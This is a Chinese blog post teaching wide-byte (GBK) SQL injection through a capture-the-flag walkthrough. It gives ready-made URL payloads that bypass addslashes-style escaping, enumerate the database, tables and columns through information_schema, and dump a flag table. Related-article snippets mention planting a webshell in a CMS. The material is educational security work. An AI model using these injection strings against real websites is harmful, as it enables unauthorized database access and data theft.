宽字节注入

最新推荐文章于 2024-04-09 14:58:50 发布
最新推荐文章于 2024-04-09 14:58:50 发布
阅读量170 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44597701/article/details/108150619
版权

宽字节注入用途

主要就是在一些SQL语句中,有的后台代码会把参数中的特殊字符进行转义,从而达到防守的目的。
例如原语句是select id,title from news where id = '1'
当把id传值为1’时,SQL语句就会变为11select id,title from news where id = '1\'',这个时候如果想要绕过是很困难的,而且这个单引号非敲不可,这时宽字节注入就派上了用场。
可以传入%df’
由于加上\和url编码,原参数会变为

%df%5c%27

这里因为%df的关系,\的编码%5c被吃掉了,也就失去了转义的效果,直接被带入到mysql中,然后mysql在解读时无视了%df%5c形成的新字节,那么单引号便重新发挥了效果.
在这里插入图片描述
这里因为

mysql_query(“SET NAMES gbk”);

当这行代码在代码层被写入时,三个字符集(客户端、连接层、结果集)都是GBK编码。
那么便会发生如上的情况。
总之就是%df%5c%27被转码了。
例如这题:
在这里插入图片描述
传入1’
在这里插入图片描述
对参数进行了转义
接着就用宽字节注入
?id=1%df%27
报错
报[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-HCAYdMEV-1598002681423)(https://imgblog.csdnimg.cn/20200821173716530.png#pic_center)]

报错了,就可以注入了
!!!虽然这里有个中文字符,但是这不影响查询,前提是数字在前
经过尝试,发现还过滤了#
?id=-1%df%27%20union%20select%201,2--+
在这里插入图片描述
显示的是2
然后我们进行查库
?id=-1%df%27%20union%20select%201,database()--+
在这里插入图片描述
查表名
?id=-1%df%27%20union%20select%201,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()--+
在这里插入图片描述
查列名
?id=-1%df%27%20union%20select%201,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x63746634--+
在这里插入图片描述
这里用十六进制是因为单引号被转义
查数据
?id=-1%df%27%20union%20select%201,group_concat(flag)%20from%20ctf4--+
这就拿到了flag

总结

1、学会宽字节注入的原理
2、知道中文字符和数字结合时,数字在前会去取出数字
3、字符串用16进制代替

weixin_44597701
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
宽字节注入详解
qq_45927819的博客
03-26 1万+
文章目录1、涉及函数2、原理分析3、实战南邮nctf-sql injection 3sql-labs-32关 1、涉及函数 addslashes() 函数返回在预定义字符之前添加反斜杠的字符串 mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符 mysql_escape_string() 转义一个字符串 2、原理分析 先了解一下什么是窄、宽字节已经常见宽字节编码: 当某字符的大小为一个字节时,称其字符为窄字节. 当某字符的大小为两个字节时,称
浅析常见WEB安全漏洞及其防御措施_web漏洞防护
最新发布
Z4400840的博客
06-25 877
在网络攻防中,Web系统通常是攻击者的首选目标,攻击者大都通过Web打点的方式,先拿到边界Web服务器的权限,再以此为跳板实施内网横向渗透。由于Web系统通常涉及大量的用户数据和敏感信息,一旦受到攻击或破坏,可能造成数据泄露、服务中断等影响。相较于攻击方,Web系统也是防守方的重点防护对象。作为安全开发或安全运营人员,及早发现和修复潜在的WEB安全漏洞,不仅有助于提高互联网业务系统的稳定性,也能降低后期安全运营工作的压力和成本。【一一帮助安全学习,所有资源获取处一一】①网络安全学习路线。
渗透测试-SQL注入之宽字节注入
lza20001103的博客
04-20 8580
渗透测试-SQL注入之宽字节注入
宽字节注入讲解-墨者学院(SQL注入漏洞测试(宽字节))
T1ngSh0w的博客
09-18 4949
宽字节注入原理讲解+墨者学院(SQL注入漏洞测试(宽字节))题目详解
13 宽字节注入1
08-03
宽字节注入攻击 宽字节注入攻击是一种常见的数据库安全漏洞,攻击者可以通过 inject恶意数据库查询语句来获得敏感信息或控制数据库。这种攻击方式通常发生在使用GBK编码的数据库中,攻击者可以使用宽字节注入来 ...
宽字节注入详解-附件资源
03-05
宽字节注入详解-附件资源
网络安全 宽字节注入 CMS网站渗透实战 学术交流
12-05
web安全初学者,跟着公开课学习了一段时间,第一次在靶场环境下,边查询边过关,请教了不少人,对blueCMS系统存在的宽字节注入漏洞成功进入后台,找到后台文件编写路径,写入一句话木马,通过蚁剑连接成功后,开始提...
第十九节 宽字节SQL注入-01
09-15
宽字节注入代码分析 在宽字节SQL注入攻击中,攻击者可以使用 Php 的addslashes 函数来转义特殊字符,例如将“'”转义为“%DF\'”。然后,在MYSQL中,这个宽字符将被认为是一个合法的字符,从而 bypass 数据库的安全...
【每天学习一点新知识】跟咩咩一起学“宽字节注入
RexHa的博客
10-19 2048
如果一个字符的大小是一个字节的,称为窄字节;如果一个字符的大小是两个字节的,成为宽字节像GB2312、GBK、GB18030、BIG5、Shift_JIS等这些编码都是常说的宽字节,也就是只有两字节英文默认占一个字节,中文占两个字节。
宽字节注入原理分析
热门推荐
1stPeak's Blog
06-07 1万+
什么是宽字节? 如果一个字符的大小是一个字节的,称为窄字节;如果一个字符的大小是两个字节的,成为宽字节。 像GB2312、GBK、GB18030、BIG5、Shift_JIS等这些编码都是常说的宽字节,也就是只有两字节 英文默认占一个字节,中文占两个字节 什么是宽字节注入? 原理: 宽字节注入是利用了mysql的一个特性,即mysql在使用GBK编码时,在url解码时会认为两个字符是一个汉字(前一个ASCII码要大于128,才表示到汉字的范围) 通常情况下,一个utf-8编码的汉子占用3个字节,一个GBK编
sql注入之宽字节注入
weixin_45653478的博客
04-09 606
如果数据库设置宽字节字 符集 gbk 会导致宽字节注入,从而逃逸 gpc 前提条件 简单理解:数据库编码与 PHP 编码设置为不同的两个编码那么就有可能产生宽字 节注入 深入讲解:要有宽字节注入漏洞,首先要满足数据库后端使用双/多字节解析 SQL 语句,其次还要保证在该种字符集范围中包含低字节位是 0x5C(01011100) 的字 符,初步的测试结果 Big5 和 GBK 字符集都是有的, UTF-8 和 GB2312 没 有这种字符(也就不存在宽字节注入)。
SQL注入 - 宽字节注入
HAKUNAMATATATTA的博客
09-05 1104
宽字节注入主要是绕过魔术引号的,数据库解析中除了UTF-8编码外的所有编码如:GBK等都有可能存在宽字节注入
宽字节注入(知识点)
qq_39416206的博客
03-11 815
宽字节注入
sql注入宽字节注入
07-28
SQL注入和宽字节注入都是常见的安全漏洞类型。下面我将简要介绍这两种注入方式。 1. SQL注入: SQL注入是一种在应用程序中利用不正确处理用户输入的漏洞,攻击者可以通过在用户输入中插入恶意的SQL代码来执行非授权的数据库操作。这可能导致数据泄露、数据篡改、绕过认证、获取系统权限等问题。 预防SQL注入的措施包括: - 使用参数化查询或预编译语句来处理数据库查询,而不是直接拼接用户输入的数据。 - 对用户输入进行严格的验证和过滤,避免将未经处理的输入直接传递给数据库查询。 - 最小化数据库用户的权限,并且仅分配最低必要的权限。 2. 宽字节注入宽字节注入是一种特定于某些数据库和编码方式的注入攻击方法。它利用了某些编码方式对特殊字符的处理不当,从而绕过了应用程序对输入进行过滤和验证的机制。攻击者可以通过插入宽字节字符来篡改SQL语句或绕过认证。 预防宽字节注入的措施包括: - 使用合适的编码方式,例如UTF-8,以避免特殊字符被误解释。 - 进行输入验证和过滤,确保特殊字符被正确处理,不会导致SQL语句的非预期解析。 - 定期更新数据库和应用程序框架,以修复已知的宽字节注入漏洞。 总的来说,要防止SQL注入和宽字节注入等安全漏洞,应该采取综合性的安全措施,包括输入验证、参数化查询、最小权限原则、使用最新版本的软件以及定期进行安全审计和漏洞扫描。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值